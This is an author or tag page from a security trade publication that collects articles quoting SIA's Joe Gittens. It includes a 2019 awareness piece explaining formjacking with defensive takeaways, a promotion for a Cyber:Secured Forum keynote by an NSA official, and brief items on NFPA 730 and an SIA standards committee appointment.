Subscribe to RSS - Joe Gittens

Joe Gittens

Formjacking, a newer way of stealing personal data online

 - 
Wednesday, October 16, 2019

Cyber Security Awareness Month is in full swing; social media is buzzing with extremely helpful content and resources, mostly of which is free to help businesses and individuals gain and stay in control of their digital worlds. As the saying goes, “you learn something new every day,” or you should. Through social media related to #NCSAM, #cybersecurityawarenessmonth and #BeCyberAware, I heard about a newer way hackers are stealing data – formjacking.

I knew the term “jacking” meant stealing, but combing it with the word “form,” it could mean a variety of things, so I reached out to my friends at the Security Industry Association (SIA) for some guidance. 

“Formjacking is the injection of malicious code into a seemingly trustworthy website form that relays a copy of the field inputs to an attacker,” Joe Gittens, director of standards, SIA, explained. “In these cases, the victim’s transaction with the trust source is not interrupted; however, information from the from, which could include sensitive data, is relayed to the attacker.” 

That literally gave me chills. I can’t speak for you, but I know I have filled out at least hundreds of forms in my digital life; reflecting back over my past 20 years, there’s no telling what data I’ve shared. And, with formjacking, here’s the kicker – there are no red flags for the average online user to look for. 

“Unlike with spoofing and phishing, there are very few tell-tale signs that a form has been compromised,” Min Kyriannis, head, technology business development, Jaros, Baum & Bolles and member of SIA’s Cybersecurity Advisory Board. In fact, the only way to detect formjacking is looking at the code, “and, unless you’re trained, it’s hard to detect,” Gittens said. 

It looks like the regular, every day Joe who is going online and filling out forms has absolutely no way of knowing his data could be at risk, although end users can self-sabotage through installing browser plug-ins, Gittens said. Therefore, it’s mainly up to the company behind the online form to ensure people and their data are protected. 

“Companies need to ensure that all software, plug-ins and any third-party applications or extensions have been vetted and check for vulnerabilities,” Kyriannis advised. “These need to be continuously checked, since software is constantly being updated.” 

It amazes me how smart cybercriminals/hackers truly are, and it’s important to never underestimate them. Think about it in these terms: once a threat is recognized and identified by the “good guys,” the “bad guys” have already moved on “looking for more covert ways to harvest data,” Gittens said, in a way that’s the “easiest to hide and what’s most lucrative” for them,” added Kyriannis.

Gittens identified partner trust as key and noted that formjacking can and has affected large and mom-and-pop institutions. “Just like with other attacks, understanding exactly what type of privileges a third-party service has on your website or your browser and only allowing the most trusted services into your ecosystem can help protect you and your business. Also, be careful about what types of information you are collecting in forms in case you are attacked. If you don’t have to collect sensitive data, don’t do it – contract a trusted third party to perform the transaction for you who has better security protocols in place and can provide you and your customers with assurances. The SIA Cybersecurity Advisory Board will soon look to provide guidance on how security stakeholders can foster more trust within the device and application ecosystem.”

Kyriannis concurs that trust is key, but “people with malicious intent will always find new ways to sneak under the radar. The industry must lead in bringing awareness to their clients, customers, etc., and self-awareness is critical – for end users, that means setting up security parameters for themselves,” such as tagging credit cards to constantly monitor charges. 

Formjacking Key Takeways

  1. Any and all information shared via an online form is at risk of being stolen. 
  2. The only way to detect formjacking is to look at the code. 
  3. Ensure software, plug-ins and any third-party applications or extensions have been vetted and regularly check for vulnerabilities.
  4. Understand the exact privileges a third-party service has on your website/browser. 
  5. If you don’t have to collect sensitive data, don’t. 
  6. Set up security parameters for yourself.

Cyber:Secured Forum helps heat up the Lone Star State

 - 
Wednesday, May 29, 2019

Things are heating up here in the Lone Star State which means air conditioning bills are about to go up, water will be consumed by the gallons, the smell of sunscreen and sun block will be everywhere, but most importantly, it means the Cyber:Secured Forum will be here before we know it at The Westin Dallas Park Central, July 29-31.

Senior Technical Director for NSA’s Cybersecurity Threat Operations Center (NCTOC), David Hogue, will be taking the stage on July 31st, 11:30am to 1:30pm, keynoting about fostering innovation and public-private partnerships in cyber defense. 

“The NSA is one of the most forward-thinking security organizations in the world,” Joe Gittens, director of standards, SIA told SSN. “David Hogue has been a technical expert on many of the agency’s cybersecurity threat mitigation efforts and a lead researcher on a number of high-profile breaches, like the Sony Pictures hack.” 

Attendees can look forward to the following take-aways from Hogue: 

  • Principles on how NSA is approaching cybersecurity innovation
  • How the security industry can partner in this overall mission; and
  • Ways the industry can develop solutions for: managing gateways and cyber perimeters, hardening endpoints to meet best practices and standards, embrace comprehensive and automated threat intelligence and cultivate a culture of curiosity and innovation. 

 

“I believe there is not a better voice to educate our industry on the emerging threats that enemies are deploying to interfere with the ever-connected nature of our nation,” Gittens said. “Security battlefronts are constantly changing, and David’s presentation will offer rare insights into how partnership and innovation within the security industry can lead to increasing success in the public and private sectors.”

I look forward to seeing everyone at Cyber:Secured and taking lots of notes on what Hogue has to offer! 

 

Should NFPA 730 go from guide to code?

SIA says no because of concerns about liability and the expense of retraining installers
 - 
11/28/2012

SILVER SPRING, Md.—A proposal to change NFPA 730, the National Fire Protection Association standard governing security systems, from a best-practices recommendation to a code is generating concerns from the security industry.

Brivo's Van Till to head SIA's Standards Committee

 - 
05/05/2011

BETHESDA, Md.—The Security Industry Association on April 28 announced that Steve Van Till, president and CEO of software as a service (SaaS) provider Brivo, has been appointed to the position of chair of SIA's Standards Committee.